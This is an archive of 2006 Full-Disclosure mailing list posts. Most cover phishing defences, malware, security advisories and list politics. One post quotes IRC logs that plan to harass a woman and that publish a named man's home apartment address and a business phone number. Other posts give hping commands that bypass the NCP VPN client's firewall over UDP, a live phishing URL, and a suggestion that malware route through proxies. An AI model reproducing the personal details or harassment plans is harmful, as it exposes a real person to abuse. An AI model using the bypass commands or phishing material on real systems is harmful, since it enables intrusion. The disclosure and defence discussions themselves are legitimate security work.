Re: FW: [Full-disclosure] Are consumers being misled by phishing?
-Original Message-From: Ajay Pal Singh Atwal [mailto: [EMAIL PROTECTED]]Sent: Friday, 30 June 2006 2:46 PMTo: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] Are consumers being misled by phishing? Here is one phishing site for paypal http://www.yourfreespace.net/users/payal/webscr_cmd=_login-run.html This is not a bad job of duplication. However, pay-pal and similar sites are used may too much for this type of attack in my opinion. The phishing email would be probably sent to every email address they could harvest setting off every alarm Websense has. Phishing attacks are most affective when duplicating something like OWA or Citrix portals.. Or even better -- Custom built company portals facing the net and only sent to a handful of addresses gathered from company X. One interesting note about the site above is that it seems to relay it's data back to the attacker using POST instead of relying on an underlying mail program/script.. -- POST data from the phishing site above--- HTtp://www.yourfreespace.net/users/payal/Processing+Login.html?login=done0%3F847password=1email=1altaddr=1checkguar=1PPIPProtPlus=PASS_encIP=62.245.23.454enctype=blowfishcontinue=ProcessingLoginacceptlogin=passacceptpassword=passLoginAttempt=SecureLoginPassSecurityMeasureCode=noneb2baf0b6a57d39abd6c44b48d6fe3559112c21e54b7e705ecc5116b3c7c38c37949e8aa81848934faf0821be04210e8c2ded3c4159edbee3ee1439f3892a3e9Access=1Submit=ProcessingLogincmd=_login-processinglogin_cmd=_login-donelogin_access=11680108541 -- Protecting against this type of attack??? I don't know of many existing content gateways / email filters that will stop the initial email if the attack is a one-off and sent on a small scale. It's just some verbiage with an A and link to the attackers IP address or site hosting the phsihing site. A lot of times the web servers have been compromised and the http server is on a non standard port unless port 80 wasn't used before. Then when the user clicks on the link the in the phishing email it opens the browser w/o triggering any alarms.. ( I haven't visited any sites that the new M$ phishing filter picked up from its whiltelists) Enters password.. game over. The attacker now logs in using the new harvested credentials .This also works with token password generators ( nothing new here ).. Given it's only a 60 second window to login after acquiring the first token code. Ideas???_- End-User security awareness and training is the most important deterrent. Whitelisting isn't going to stop small footprint attacks directed at a single company and a handful of users. Most companies believe that blocking HTML in email handicaps emails effectiveness.. ( screw the newsletters.. put it on a website ) Users should copy links from the email into the browser but don't. Certificates will protect where tokens fail. Network Protection: I believe that it's possible to develop widgets to alert on this type of directed phishing attacks. First you have to have the ability to monitor all emails traffic. This shouldn't piss off legal because all users should have already signed off on this. The most effective would be to monitor all known public email addresses. Including planted'email address placed in forums and webpages to be harvested. This would provide a greater % that traffic sent to those addresses are directed attacks.. (Like an Email Honeypot :) ( yes... need to copyright that one quick muhahah :) It should be easy to develop an analysis to pick up on standard phishing emails. You would look for Anchors / links with IP addresses that resolve outside of the known- whiteliested address list. This should at least alert and place the email in a second level queue for analysis. You could also do some type of grep on the email link looking for company X verbiage. M$ Phishing filter may even be USEFUL ( Almost ) So using the methods above you would have a system to alert on potential phishing attacks scanning all emails or preferably only public emails included planted ones. The widget performs analysis to determine if the email is a phishing attack. This process could be automated to perform the whois so on… So now we should have determined the IP or block for the hosted phishing site. We can use something like M$ phishing filter. Send it the new whitelisted IP address of the phishing site and the browser should block the site. If the widget monitors all emails coming into the company then it should have the ability to do some trending of who received certain emails.. sorted on subjects for instance. One you found the phishing email you would have a known list of all email addresses that received the email once the attack has been spotted. This could be used as additional analysis to monitor traffic after the attack. Just some ideas I have had. If anyone is interested
Re: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program
Google STRIDE and DREAD in terms of computer security; http://wiki.okopipi.org/wiki/Security_concerns -- c0redump - Original Message - From: huan chen To: full-disclosure@lists.grok.org.uk Sent: Friday, June 30, 2006 3:40 AM Subject: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program forwarding to this list for opinion... - Original Message - From: huan chen [EMAIL PROTECTED] To: Web Security [EMAIL PROTECTED] Sent: Thursday, June 29, 2006 3:51 PM Subject: [WEB SECURITY] Application Security Program List, We are trying to design a big picture information security program for out organization. The goal is to concentrate on application security. Sub tasks should include stuff like policy gap analysis, pen test balc box and white box, etc. The goal is to do all the activities and measure progress on an yearly basis/ Are thier any existing frameworks? Anything that has worked / not worked for you guys? Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: FW: [Full-disclosure] Are consumers being misled by phishing?
On 6/29/06, Josh L. Perrymon [EMAIL PROTECTED] wrote: Most companies believe that blocking HTML in email handicaps emails effectiveness.. ( screw the newsletters.. put it on a website ) Hehe, agree with you there. Network Protection: I believe that it's possible to develop widgets to alert on this type of directed phishing attacks. First you have to have the ability to monitor all emails traffic. This shouldn't piss off legal because all users should have already signed off on this. MmmHmm. Enter 1984. The most effective would be to monitor all known public email addresses. Including planted' email address placed in forums and webpages to be harvested. This would provide a greater % that traffic sent to those addresses are directed attacks.. (Like an Email Honeypot :) Planted e-mail addresses is an old idea. And so are e-mail honeypots. Link: http://wiki.apache.org/spamassassin/ReportingMboxesToRazor I also found a forum recently (sorry, don't remember the link) where somebody took the IP address of visitors to his site and encrypted it into a unique e-mail address so that he could learn the IPs of spam bots. It should be easy to develop an analysis to pick up on standard phishing emails. You would look for Anchors / links with IP addresses that resolve outside of the known- whiteliested address list. This should at least alert and place the email in a second level queue for analysis. You could also do some type of grep on the email link looking for company X verbiage. So... anything that doesn't match the whitelist gets tested against the blacklist? :) Having a more strict filter for users who aren't in the user's address book is (IMO) one of the best ways, but that relies more on the end user than on the company's sys admin. M$ Phishing filter may even be USEFUL ( Almost ) So using the methods above you would have a system to alert on potential phishing attacks scanning all emails or preferably only public emails included planted ones. The widget performs analysis to determine if the email is a phishing attack. Thunderbird does some analysis in this area already. It's probably closely related to the junk filters, but the phishing mails generally find their way to the Junk or Trash folder before being opened on this end, so I don't know a lot about it. This process could be automated to perform the whois so on… So now we should have determined the IP or block for the hosted phishing site. We can use something like M$ phishing filter. Send it the new whitelisted IP address of the phishing site and the browser should block the site. If the widget monitors all emails coming into the company then it should have the ability to do some trending of who received certain emails.. sorted on subjects for instance. One you found the phishing email you would have a known list of all email addresses that received the email once the attack has been spotted. Performing thousands of WHOIS lookups per day for a medium-sized business might be a little pricey for the purpose. There are tools (like SpamAssassin) to filter out spam messages -- Even commercial programs, but from what I hear, none of them is at 100% efficiency. Hey, AOL is even charging to be on their white list. The widget might be useful for companies where all e-mail is only accessible from a web interface (and e-mail can be deleted from the local mbox file later), but generally you don't argue with the CEO when he says he wants to use XYZ e-mail client while he is travelling. Some of the employees, or worse, management, will see these e-mail messages on occasion. This means that there would either have to be a delayed delivery system for incoming e-mail, or the e-mail clients will have to have an understanding of phishing -- and if that were the case, then the widget should have caught it anyway. The user still has to be educated. My solution is simple. We have deer season, rabbit season, and tourist season. Start a spammer season! -- Chris Umphress http://daga.dyndns.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Corporate Virus Threats
When the malicious code writers build their viruses and Trojans why not code the threats to detect the use of proxy servers and if used, connect through them. Typically you can get to the internet through the default gateway directly from the computer without needing to configure proxy settings. A better question would be why do viruses run in user-mode versus kernel mode (see http://www.phrack.org/show.php?p=62a=6 Kernel-mode backdoors for Windows NT)? My guess is that 15-18 year old kids that write viruses mostly use recycled code and are often poorly written. Working in Corporate America, most firewall configurations block outbound TCP 80, as the proxies listen on other non-standard TCP ports. I do not agree with this. Most corporations allow outbound TCP 80. I think this thread is more appropriate for focus-virus and not Full-disclosure. Angelo Castigliola III Enterprise Security Architecture UnumProvident The posts and threads in this email do not reflect the opinions of nor are endorsed by UnumProvident, Inc., nor any of its employees. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Terminal Entry Sent: Thursday, June 29, 2006 10:14 AM To: Bug Traq; Full Disclosure Subject: [Full-disclosure] Corporate Virus Threats When the malicious code writers build their viruses and Trojans why not code the threats to detect the use of proxy servers and if used, connect through them. Working in Corporate America, most firewall configurations block outbound TCP 80, as the proxies listen on other non-standard TCP ports. A virus should first check to determine if a proxy is used and if so use that proxy to download the malicious code, backdoor, etc. Thoughts... Terminal Entry ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NCP VPN/PKI Client: UDP Bypassing
Application:NCP VPN/PKI Client Site: http://www.ncp.de Version:8.30, Build 59 and maybe lower OS: Windows Possible problem: UDP Bypassing Product: NCP's Secure Communications provides a comprehensive portfolio of products for implementing total solutions for high-security remote access. These software-based products comply fully with all current major technology standards for communication and encryption, as defined by the IETF (Internet Engineering Task Force) and ITU (International Telecommunication Union). Consequently all products can be smoothly integrated into any existing network and communication architectures. Your Internet infrastructure, which may already consist of third-party security and access components, can be further used without changes - thus avoiding any unnecessary administrative costs. About: = There are two 'firewalls' part of the NCP VPN/PKI Client. The 'Link Firewall' and some sort of 'personal firewall'. The function of the 'Link Firewall' is to prevent any traffic between an untrusted net and an active vpn connection. The 'Link Firewall' just can be turned on or off. The 'personal firewall' can be configured with rules like all of you probably know from other similar personal firewalls. For my tests I activated the 'Link Firewall' and configured the 'personal firewall' to prevent any in- or outbound traffic. UDP Bypassing, both directions = During some configuration tests for the NCP VPN/PKI Client I noticed that the machine still received an ip-address via DHCP, although both firewalls were enabled. So I did some research and figured out that it's possible to send and receive data from and to another machine. On the client with the NCP VPN/PKI Client installed you have to use port 68 (UDP, sending and receiving) and on the 'other side' you have to use port 67 (UDP, sending and receiving). For testing I wrote a little perl script which looks so unbelievable embarrassing that I better show how to use the bug using hping ;) So to send something to the machine secured with the NCP VPN/PKI Client use hping like this. hping.exe -2 -c 1 -s 67 -p 68 -e You should've never gone to Hollywood $TARGET To send data from the machine with the NCP VPN/PKI Client to another pc use hping like this. hping.exe -2 -c 1 -s 68 -p 67 -e You should've never trusted Hollywood $TARGET This will also work if you're connected to a VPN. History: 2006-05-12: Found the possible problems 2006-05-16: Mailed the vendor, no response 2006-05-22: Mailed the vendor again 2006-05-23: The vendor replied 2006-05-26: The vendor replied with technical details ports -- SYS 64767 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed
The FBI, in a statement from its Baltimore field office, said a preliminary review of the equipment by its computer forensic teams has determined that the data base remains intact and has not been accessed since it was stolen. More tests were planned, however. Didn't the original wanted notice for this hardware specifically mention an external (USB) drive? Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies' How are their forensic people going to determine if *that* happened? Their argument about a real crook wouldn't return the hardware .. well, why not? .. $50,000 to buy that fancy ID printer off eBay to get yourself started. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RFID Attack theory
So most of the research has been done here already.. Which brings me to the work done by www.rfidvirus.org http://www.rfidvirus.org They have some really good ideas about attacking the middleware using SQL injections, SSL includes, and buffer overflows on the reader to middle ware interface. Some really good stuff. As small as the actual chips are, imagine how much fun you could have if you scattered handfuls of malicious chips around your favorite high-security place (airport, office, whatever...). You could render these high-tech authentication schemes completely useless .. just like the military does with their carbon-fiber bombs designed to defeat electrical gear. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed
I don't think they can detect some highly advanced techniques like using Partition Magic to mirror the disk.. On Fri, 30 Jun 2006 10:07:46 -0400 Michael Holstein [EMAIL PROTECTED] wrote: MH The FBI, in a statement from its Baltimore field office, said a MH preliminary review of the equipment by its computer forensic teams MH has determined that the data base remains intact and has not been MH accessed since it was stolen. More tests were planned, however. MH MH Didn't the original wanted notice for this hardware specifically MH mention an external (USB) drive? MH MH Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies' MH MH How are their forensic people going to determine if *that* happened? MH MH Their argument about a real crook wouldn't return the hardware .. MH well, why not? .. $50,000 to buy that fancy ID printer off eBay to get MH yourself started. MH MH /mike. MH MH ___ MH Full-Disclosure - We believe in it. MH Charter: http://lists.grok.org.uk/full-disclosure-charter.html MH Hosted and sponsored by Secunia - http://secunia.com/ MH year(now) + 1 será o ano do linux! Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed
Cardoso schrieb: I don't think they can detect some highly advanced techniques like using Partition Magic to mirror the disk.. As long as they didn't know the exact amount of hours the hdd was running before it got stolen, i don't see any way to determine if the data was copied away by some sector-by-sector copy-tool like Ghost or True Image. Afaik you can see very clearly how many hours a drive has run yet. If that data was the same as before the laptop was stolen, then the disk didn't run. If the data differs, the drive did run. I am not sure if one could alter that data. On the other hand... i don't think that anyone knows that data all the time, so they couldn't have known the running-time of the disk, unless they knew the hdd was about to be stolen. (pardon my bad english) Michael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200606-30 ] Kiax: Arbitrary code execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Kiax: Arbitrary code execution Date: June 30, 2006 Bugs: #136099 ID: 200606-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A security vulnerability in the iaxclient library could lead to the execution of arbitrary code by a remote attacker. Background == Kiax is a graphical softphone supporting the IAX protocol (Inter Asterisk eXchange), which allows PC users to make VoIP calls to Asterisk servers. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/kiax 0.8.5_p1 = 0.8.5_p1 Description === The iax_net_read function in the iaxclient library fails to properly handle IAX2 packets with truncated full frames or mini-frames. These frames are detected in a length check but processed anyway, leading to buffer overflows. Impact == By sending a specially crafted IAX2 packet, an attacker could execute arbitrary code with the permissions of the user running Kiax. Workaround == There is no known workaround at this time. Resolution == All Kiax users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/kiax-0.8.5_p1 References == [ 1 ] CVE-2006-2923 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2923 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200606-30.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpSrjNX54VaP.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability
ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-020.html June 29, 2006 -- CVE ID: CVE-2006-1467 -- Affected Vendor: Apple -- Affected Products: iTunes -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 3, 2006 by Digital Vaccine protection filter ID 4282. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple iTunes. Exploitation requires an attacker to convince a target user into opening a malicious play list file. The specific flaw exists during the processing of malicious AAC media files such as those with extensions .M4A and .M4P. During the parsing of the sample table size atom (STSZ), a malformed 'sample_size_table' value can trigger an integer overflow leading to an exploitable memory corruption. -- Vendor Response: Apple has addressed this issue in the latest release of iTunes, version 6.0.5. More information is available from the vendor web site at: http://docs.info.apple.com/article.html?artnum=303952 -- Disclosure Timeline: 2006.04.03 - Digital Vaccine released to TippingPoint customers 2006.04.07 - Vulnerability reported to vendor 2006.06.29 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by ATmaCA. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Corporate Virus Threats
On 6/30/06, Castigliola, Angelo [EMAIL PROTECTED] wrote: When the malicious code writers build their viruses and Trojans why not code the threats to detect the use of proxy servers and if used, connect through them. Typically you can get to the internet through the default gateway directly from the computer without needing to configure proxy settings. A better question would be why do viruses run in user-mode versus kernel mode (see http://www.phrack.org/show.php?p=62a=6 Kernel-mode backdoors for Windows NT)? My guess is that 15-18 year old kids that write viruses mostly use recycled code and are often poorly written. Working in Corporate America, most firewall configurations block outbound TCP 80, asthe proxies listen on other non-standard TCP ports. I do not agree with this. Most corporations allow outbound TCP 80. I think this thread is more appropriate for focus-virus and not Full-disclosure. Full-Disclosure should setup its own dedicated lists for individual topics like securityfocus.com do. The thought of going near a Symantec run list makes me cringe. John Cartwright, can we have more Full-Disclosure lists setup for specialized topics? Heres my suggestions: FD social engineering and phishing list - discussion of social engineering issues and its variants FD vulnerability development list - discussion of development and prevention of vulnerabilities FD incident response and recovery list - discussion of response and recovery issues FD voice over internet protocol list - discussion of VoIP security issues FD web application security list - discussion of web application, and AJAX, FJAX secure coding. FD bug disclosures list - discussion of new security threats and analysis FD enterprise security list - discussion of corporate security issues, and patch management, and employee monitoring FD security careers list - discussion of latest jobs within security industry FD media coverage list - discussion of security related stories in the news FD vendor software support list - discussion of security product support, anti virus, ids, firewall issues, security basics, setting up software securely FD is the future! Its time to upgrade FD, so we can take on the might of Securityfocus.com, and give them a run for their money. Don't copy Securityfocus though, originate, not duplicate! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory from AMIT concern BANTOWNE
HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE. RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME, GNNA AND BANTOWNE. GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION TELL ME BANTOWNE TO BLAME. SO THROUGH DEVIOUS MEANS I INFILTRATE BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT CALLED #BANTOWN (MINUS THE E TOO). THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I EXCERPT FROM CHANNEL: incog that reminds me... ill go find xss in fark.com incog k, i just found xss in imdb... but my memory is so bad that i dont know if this is new or i just rediscovered it incog just found xss in youtube incog i have xss on flickr incog xss on technocrati incog weev, i have xss on all turdpress blogs ever lncog i just found dailykos xss for rolloffle whatcog I have SA xss whatcog on secure.somethingawful.com THAT OVER FEW DAYS OF TALK. INCOG SEEM TO BE MOST BRUTAL SCRIPT-KIDDIE KNOWN TO MAN, BUT WE CHECK OUT ANOTHER PERSON HE CALLED WEEV. HE BEEN AROUND THE BLOCK A LONG TIME AND HE HAVE MANY IDEA HOW TO CAUSE DAMAGE TO FREENODE AND A MAN NAME LILO. AGAIN I EXCERPT FROM CHANNEL: weev okay guys weev i need you to find some mexican woman in houston weev and just relentlessly troll her weev call her up at all hours of the night weev screaming ROB LEVIN, ROB LEVIN weev and then we're going to say she's the nanny for his kids WEEVE ALSO ENCOURAGE INGOC TO HACKING ACTIVITIES, PROBABLY FOR HIS OWN USAGE LATER ON. I EXCERPT: weev incog: can you get flickr? incog ill try cstone oh god flickr would be hilarious incog flickr uses yahoo id's weev not necessarily weev there are internal flickr ids too weev and it doesnt use the yahoo cookie weev basically you auth with your yahoo id weev and then it gives you a flickr cookie weev and from there its all flickr LIKE SAID, WEEV KNOW A LOT AND PROBABLY RINGLEADER, OR AS THEY SAID IN AMERICA, MASTER OF PUPPETS. AND I DO THINK MANY PEOPLE ON THE CHANNEL PUPPETS. SOME VERY SCRIPT-KIDDIE LIKE. WELL, IT OBVIOUS ALL ARE SCRIPT KIDDIE, BUT SOME ARE VERY. VERY. MOST ALSO IRC KIDDIE. I EXCERPT: tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged tem they unbelievers must be purged bizzy WHY IS SALAD SO GOOD?!!?! bizzy WHY IS SALAD SO GOOD?!!?! bizzy WHY IS SALAD SO GOOD?!!?! AS YOU CAN SEE, SOME VERY DUMB AND NOT UNDERSTAND IRC CLIENT PROPERLY. THERE MANY MORE EXAMPLE OF ABOVE EXCERPT, BUT I LIMIT TO THAT CAUSE IS ANNOYING. BUT WORSE IS YET TO COME, B/C WEEAVE POST PERSONAL INFOMATION OF ROBERT LIVIN, OTHERWISE KNOWN AS LELO ON FREENODE NETWORK, THE TRUCK DRIVER, FOR PLANE VIEW OF ALL TO ABUSE. BANTOWN ALSO RESPONSIBLE FOR POST OF INFORMATION TO CRAIGLIST AND OTHER PLACES. I EXCERPT BUT MUST CENSOR SO THIS INFO IS NOT USED FOR CRIME: weev philsanchez: lilo's federal employer identification number is xx-xxx weev his federal identification number is xx-xxx weev the address officially listed for pdpc is 10100 main street #31 houson tx 77025 weev phone number for pdpc officially listed is 713-589-5863 weev his ssn is xxx xx weev his dob is xx-xx-1955 weev 11-digit texas state taxpayer number xxx weev ROBERT LEVIN weev 9212 BURDINE ST. #1005 weev HOUSTON, TX 77096 weev the last address is his apartment weev no, he doesnt live in a trailer MANY ON #BANTOON SPEAK HIGHLY OF RUIN, WHICH IS SKRIPT-KIDDIE FOR CAUSE HAVOK ON IRC OR NETWORK OR SOME MAIL PROGRAMS. SOME ALSO EAT SALAD OR DISPLAY ANNOYING QUIRK WHERE THEY NOT MAKE SENSE FOR EXTENDED PERIOD OF TIME AND ACT LIKE
RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE
Thanks for the 0day advisory! It helped out a lot. (ps: 10yrs English course, 10yrs security would have been a better choice for you if you ask me) HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE. THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE MODERN PC ARE COMMONPLACE AS USER. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Juha-Matti Laurio Sent: Thursday, June 29, 2006 8:08 PM To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS) The related SANS Internet Storm Center Diary entry is the following: http://isc.sans.org/diary.php?storyid=1448 This story was updated later on Wednesday to include detailed test results. Secunia test link included to SA20825 advisory was used. I have not reproduced it with Firefox 1.5.0.4 in Win XP SP2 and W2K SP4 SF, for some reason. Firefox version is localized in my test environment, as well. Tested on: Firefox 1.5.0.4 on Mac OS 10.4 - not vulnerable Firefox 1.5.0.4 on FreeBSD 6.0 (x86) - not vulnerable Firefox 1.5.0.4 on Windows XP Professional SP2 - not vulnerable Internet Explorer 6.0.2900.2180.xpsp.050622-1524 on Windows XP Professional SP2 - vulnerable Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas http://www.utdallas.edu/ir/security/ smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] New member asking question...
Question for everyone on the board? I have been reading the posts over the past few weeks, and am wondering how the heck you guy discover these vulnerabilities. Granted, I am still very new to the IS world, but I cannot begin to understand how you discover weaknesses. After reading these posts, the explanation always makes since, but are you guys actively seeking weaknesses, or just happen to come across them? Also, are there any good Hacking books that I could read? I have had a Hackers Tool and Techniques class at school, but all of the programs are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and such. I am looking to actually enter systems or find ways to enter systems and understand the weakness that allows it so I can avoid it later. Thanks everyone. Joseph K. Reynolds Systems Support Analyst - Intermediate Enterprise Rent-A-Car Email JR Reynolds 314-512-2370 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory from AMIT concern BANTOWNE
Thanks for the 0day advisory! It helped out a lot. YOU ARE VERY WELCOME SIR. (ps: 10yrs English course, 10yrs security would have been a better choice for you if you ask me) PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS OF LEARNING TO READ. THANKS YOU. AMIT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Corporate Virus Threats
On 6/30/06, Antczak, Ed [EMAIL PROTECTED] wrote: I second the motion. An opportunity to focus and filter the broad spectrum of security issues is welcome if possible. Edwin Antczak Windows Engineer I see a major loophole here, as we don't know how much traffic on the dedicated securityfocus lists are being moderated, and the potential useful information being turned away. Sure, script kid flames may be anti-social, but even they are useful to a certain audience. (government, law inforcement) I see a big blackspot right now where high profile moderation of serious security topics are being moderated into the Securityfocus profit margin model, than protecting the needs of consumer and corporate interests. Its time for an open source full disclosure alternative to the Securityfocus list-set, in order to really know whats going on, because you can bet even the stuff the Securityfocus moderators get to see, is passed onto Symantecs intelligence engine, even if the moderator doesn't let the thread go live on the securityfocus lists. I.e. Symantec are getting so much more information than the average joe, via the intelligence post to moderators, than the public gets to see, and that frustrates me. Symantec have a huge intelligence facility in England, its an old nulcear bunker with huge steal doors, where they compile intelligence data sent to the list moderators, and only a small percentage of that goes live to the public. We need more lists, so people can cross post and see whats really getting sent to Securityfocus moderators and rejected in all security specialized subjects, not just new bug disclosure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE
